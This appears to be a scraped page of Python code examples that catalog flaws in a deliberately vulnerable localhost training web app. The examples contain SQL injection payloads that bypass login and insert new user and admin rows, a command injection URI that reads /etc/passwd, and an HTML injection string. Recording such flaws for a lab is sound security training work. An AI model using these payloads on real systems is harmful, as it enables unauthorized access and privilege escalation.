Exemple #1
0
def adminlogin_page_access():
    flaw = fl('Information leakage','http://localhost:8081/secu/login.secu','Leakage in login')
    field1 = fs('javascript','obfuscated','click invisible point after last word')
    field2 = fs('password','cheat for password or use sql inject','#muse1')
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #2
0
def login_page_insertuser():
    flaw = fl('SQLinject','http://localhost:8081/secu/login.secu','SQL inject in login')
    field1 = fs('username','Not validated - look forum','alan')
    field2 = fs('password',"Not validated","t' or '1' = '1'; insert into M_USER (ID,muname,mpwd) values (6,'chris','pwd5');select count(*) from M_USER where muname='alan' and mpwd='pwd1")
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #3
0
def login_page_insertadmin():
    flaw = fl('Information leakage','http://localhost:8081/secu/login.secu','sqlinject admin')
    field1 = fs('username','not validated','alan')
    field2 = fs('password','sql inject',"t' or '1' = '1'; insert into M_ADMIN (ID,mpwd) values (2,'d3751d33f9cd5049c4af2b462735457e4d3baf130bcbb87f389e349fbaeb20b9');select count(*) from M_USER where muname='chris' and mpwd='pwd5")
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #4
0
def login_page():
    flaw = fl('SQLinject','http://localhost:8081/secu/login.secu','SQL inject in login')
    field1 = fs('username','Not validated - look forum','alan')
    field2 = fs('password',"Not validated","test' or '1' = '1")
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #5
0
def login_page():
    flaw = fl('SQLinject', 'http://localhost:8081/secu/login.secu',
              'SQL inject in login')
    field1 = fs('username', 'Not validated - look forum', 'alan')
    field2 = fs('password', "Not validated", "test' or '1' = '1")
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #6
0
def adminlogin_page_access():
    flaw = fl('Information leakage', 'http://localhost:8081/secu/login.secu',
              'Leakage in login')
    field1 = fs('javascript', 'obfuscated',
                'click invisible point after last word')
    field2 = fs('password', 'cheat for password or use sql inject', '#muse1')
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #7
0
def login_page_insertuser():
    flaw = fl('SQLinject', 'http://localhost:8081/secu/login.secu',
              'SQL inject in login')
    field1 = fs('username', 'Not validated - look forum', 'alan')
    field2 = fs(
        'password', "Not validated",
        "t' or '1' = '1'; insert into M_USER (ID,muname,mpwd) values (6,'chris','pwd5');select count(*) from M_USER where muname='alan' and mpwd='pwd1"
    )
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #8
0
def login_page_insertadmin():
    flaw = fl('Information leakage', 'http://localhost:8081/secu/login.secu',
              'sqlinject admin')
    field1 = fs('username', 'not validated', 'alan')
    field2 = fs(
        'password', 'sql inject',
        "t' or '1' = '1'; insert into M_ADMIN (ID,mpwd) values (2,'d3751d33f9cd5049c4af2b462735457e4d3baf130bcbb87f389e349fbaeb20b9');select count(*) from M_USER where muname='chris' and mpwd='pwd5"
    )
    flaw.fields.append(field1)
    flaw.fields.append(field2)
    return flaw.printFlaw()
Exemple #9
0
def fielmanager():
    flaw = fl('command inject','http://localhost:8081/secu/admininternpic.secu','Command injection')
    field1 = fs('uri','Not validated','http://localhost:8081/secu/admininternpic.secu?path=/etc/passwd;cat%20/etc/passwd')
    flaw.fields.append(field1)
    return flaw.printFlaw()
Exemple #10
0
def image_library():
    flaw = fl('XSS','http://localhost:8081/secu/picturegallery.secu','Possible XSS in URI')
    field = fs('URI','Not validated','http://localhost:8081/secu/picturegallery.secu?pic=http://localhost:8081/secu/img/logo.png')
    flaw.fields.append(field)
    print flaw.printFlaw()
Exemple #11
0
def search_page():
    flaw = fl('XSS','http://localhost:8081/secu/search.secu','Possible XSS in search field')
    field = fs('searchfield','Not validated','--><b>problem</b>')
    flaw.fields.append(field)
    return flaw.printFlaw()